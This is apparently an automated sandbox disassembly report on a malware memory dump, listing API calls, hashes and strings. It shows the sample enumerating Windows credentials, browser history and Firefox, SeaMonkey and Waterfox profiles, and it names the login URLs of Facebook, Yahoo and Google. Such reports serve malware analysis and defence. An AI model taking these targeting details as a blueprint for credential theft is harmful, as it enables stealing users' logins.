                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                  • API String ID: 3883404497-2982631422
                                                  • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                  • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                  • memset.MSVCRT ref: 0040BC75
                                                  • memset.MSVCRT ref: 0040BC8C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                  • memcpy.MSVCRT ref: 0040BD2B
                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                  • String ID:
                                                  • API String ID: 509814883-3916222277
                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile$??3@ErrorLast
                                                  • String ID: |A
                                                  • API String ID: 1407640353-1717621600
                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                  • String ID: r!A
                                                  • API String ID: 2791114272-628097481
                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                  • wcslen.MSVCRT ref: 0040C82C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                  • API String ID: 62308376-4196376884
                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                  • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                  • wcslen.MSVCRT ref: 0040BE06
                                                  • _wcsncoll.MSVCRT ref: 0040BE38
                                                  • memset.MSVCRT ref: 0040BE91
                                                  • memcpy.MSVCRT ref: 0040BEB2
                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                  • wcschr.MSVCRT ref: 0040BF24
                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                  • String ID:
                                                  • API String ID: 3191383707-0
                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00403CBF
                                                  • memset.MSVCRT ref: 00403CD4
                                                  • memset.MSVCRT ref: 00403CE9
                                                  • memset.MSVCRT ref: 00403CFE
                                                  • memset.MSVCRT ref: 00403D13
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 00403DDA
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Waterfox$Waterfox\Profiles
                                                  • API String ID: 3527940856-11920434
                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00403E50
                                                  • memset.MSVCRT ref: 00403E65
                                                  • memset.MSVCRT ref: 00403E7A
                                                  • memset.MSVCRT ref: 00403E8F
                                                  • memset.MSVCRT ref: 00403EA4
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 00403F6B
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                  • API String ID: 3527940856-2068335096
                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00403FE1
                                                  • memset.MSVCRT ref: 00403FF6
                                                  • memset.MSVCRT ref: 0040400B
                                                  • memset.MSVCRT ref: 00404020
                                                  • memset.MSVCRT ref: 00404035
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 004040FC
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                  • API String ID: 3527940856-3369679110
                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                  • API String ID: 3510742995-2641926074
                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                  • memset.MSVCRT ref: 004033B7
                                                  • memcpy.MSVCRT ref: 004033D0
                                                  • wcscmp.MSVCRT ref: 004033FC
                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                  • String ID: $0.@
                                                  • API String ID: 3030842498-1896041820
                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 2941347001-0
                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00403C09
                                                  • memset.MSVCRT ref: 00403C1E
                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                  • wcscat.MSVCRT ref: 00403C47
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • wcscat.MSVCRT ref: 00403C70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                  • API String ID: 3249829328-1174173950
                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040A824
                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • wcscpy.MSVCRT ref: 0040A854
                                                  • wcscat.MSVCRT ref: 0040A86A
                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 669240632-0
                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcschr.MSVCRT ref: 00414458
                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                  • String ID: "%s"
                                                  • API String ID: 1343145685-3297466227
                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                  • String ID: GetProcessTimes$kernel32.dll
                                                  • API String ID: 1714573020-3385500049
                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004087D6
                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
